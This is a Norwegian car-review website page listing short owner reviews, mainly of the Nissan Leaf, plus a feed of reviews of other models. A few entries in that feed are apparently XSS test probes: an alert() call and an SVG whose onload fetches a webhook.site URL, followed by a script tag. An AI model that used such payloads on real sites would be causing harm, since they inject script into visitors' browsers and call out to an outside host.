Vurdert av aberra
Flere vurderinger fra samme generasjon
Nissan Leaf (2017)
Rimelig og driftssikker bil med ingen uforutsette utgifter så langt (kjørt 60.000 km). Ingen degradering av batteriet.
Nissan Leaf (2017)
En god, billig og enkel bil å kjøre. Elsker forhåndsoppvarming, e-pedal, oppvarmbart ratt, skinnseter, oppvarmbare seter foran og bak, uproblematisk bluetooth, stort bagasjerom.
Nissan Leaf (2017)
El bilenes svar på boblen.
Nissan Leaf (2017)
Veldig fornøyd etter tre år på veien
Nissan Leaf (2017)
Ikke noe som pynter opp på tunet, men rimelig og driftssikker
Nissan Leaf (2017)
God og komfortabel bil til en rimelig penge. Driftssikker og økonomisk, som ikke skiller seg nevneverdig ut lenger. Uten lydanlegg fra bose forsvinner "basskassa" i bagasjerommet som gjør at man få
Nissan Leaf (2017)
Alt i alt veldig fornøyd. Veldig fin bil og gode ordninger når det kommer til nedbetaling av den. Som student, er det viktig å ha en jobb på side, men det er nesten et must, når stipendet dek
Nissan Leaf (2017)
Avgiftsbil, billig å eie, godt alternativ til buss, ingen stor kjøreglede, ikke dårlig på noen måter heller. helt ok..
Nissan Leaf (2017)
El bilenes svar på folkevognen
Nissan Leaf (2017)
Super bil. Enkelt og greit
Nissan Leaf (2017)
Veldig fornøyd, vi gar kun elbiler og kjører denne ofte på langtur, kjører 25.000 km/år
Nissan Leaf (2017)
En veldig god bil jeg bruker til å pendle 90km hver dag. 45km - Lading - 45km. Fungerer utmerket til det men skulle ønske litt bedre batteri. God oversikt i bilen, føles sprek, godt utstyrt.
Nissan Leaf (2016)
Driftssikker, super bil i det daglige. Ikke veldig spennende, men rimelig og trygt bilhold veier opp.
Nissan Leaf (2016)
Får du tak i en 2013 modell eller nyere som er kjøpt ny i Norge er denne bilen rett og slett et kupp som bil nr 2.
Nissan Leaf (2016)
Bra bybil som jeg kan kjøre opptil 15 mil på en lading.
Flere vurderinger
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.